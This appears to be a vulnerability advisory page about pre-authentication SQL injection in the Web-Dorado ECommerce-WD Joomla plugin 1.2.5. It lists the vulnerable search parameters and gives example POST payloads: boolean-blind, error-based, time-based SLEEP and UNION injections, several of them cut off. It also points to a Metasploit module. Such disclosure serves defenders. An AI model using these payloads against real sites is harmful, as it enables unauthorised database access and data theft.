Multiple Pre-Auth SQLi Vulnerabilities in Web-Dorado ECommerce-WD Joomla Plugin with PoCs

# Critical Vulnerability Information - **Vulnerability Type**: Multiple Unauthenticated SQL Injection - **Affected Component**: Web-Dorado ECommerce-WD Joomla Plugin (version 1.2.5) - **Impacted Functionality**: Advanced Search Feature ## Vulnerable Parameters - `filter_manufacturer_ids` - `search_category_id` - `sort_order` ## Vulnerability Types - **Boolean-based Blind SQL Injection** - **Error-based SQL Injection** - **Time-based Blind SQL Injection** - **UNION Query** ## Example Payloads ### filter_manufacturer_ids - Boolean-based Blind (POST): ``` product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_manufacturer_ids=1 AND 8066=8066 AND (7678=7678&[...] ``` - Error-based Injection: ``` product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_manufacturer_ids=1) AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6[...] ``` - Time-based Blind: ``` product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_manufacturer_ids=1) AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND (1480=1480&[...] ``` ### search_category_id - Boolean-based Blind (POST): ``` product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND 3039=3039 AND (2627=2627&[...] ``` - Error-based Injection: ``` product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(5158=5158,1))),0x7f706a6[...] ``` - Time-based Blind: ``` product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND (1251=1251&[...] ``` - UNION Query: ``` product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x7f706a6871)-- &filter_filte[...] ``` ### sort_order - Boolean-based Blind (POST): ``` product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range[...] ``` - Time-based Blind: ``` product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range[...] ``` ## Exploit Module - A Metasploit module exploits these vulnerabilities and can be found on ExploitHub:

Goal Reached Thanks to every supporter — we hit 100%!

Multiple Pre-Auth SQLi Vulnerabilities in Web-Dorado ECommerce-WD Joomla Plugin with PoCs